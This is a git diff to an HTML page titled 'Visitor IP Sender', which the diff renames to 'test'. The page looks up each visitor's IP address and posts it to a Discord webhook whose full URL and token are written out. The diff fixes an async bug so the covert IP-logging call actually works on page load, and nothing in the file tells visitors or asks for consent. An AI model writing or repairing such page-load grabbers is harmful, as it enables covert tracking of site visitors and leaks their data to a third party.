--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Visitor IP Sender</title>
+    <title>test</title>
 </head>
 <body>
 
@@ -14,31 +14,32 @@
         const webhookUrl = 'https://discord.com/api/webhooks/1181568688365772810/a8uz5coZtPV_fm96znZsrCny53RXJn55vjU0P6QfzL7VVVvcoDjnCvKgfbjPhHARDI5N';
 
         // Function to send IP to Discord
-        const sendIPToDiscord = () => {
+        const sendIPToDiscord = (ip) => {
             fetch(webhookUrl, {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json',
                 },
                 body: JSON.stringify({
-                    content: `New visitor IP: ${getVisitorIP()}`,
+                    content: `New visitor IP: ${ip}`,
                 }),
             });
         };
 
         // Function to get visitor's IP address
-        const getVisitorIP = () => {
-            return fetch('https://api64.ipify.org?format=json')
-                .then(response => response.json())
-                .then(data => data.ip)
-                .catch(error => {
-                    console.error('Error fetching IP:', error);
-                    return 'Unknown';
-                });
+        const getVisitorIP = async () => {
+            try {
+                const response = await fetch('https://api64.ipify.org?format=json');
+                const data = await response.json();
+                return data.ip;
+            } catch (error) {
+                console.error('Error fetching IP:', error);
+                return 'Unknown';
+            }
         };
 
         // Call the function when the page loads
-        sendIPToDiscord();
+        getVisitorIP().then(sendIPToDiscord);
     });
 </script>
 
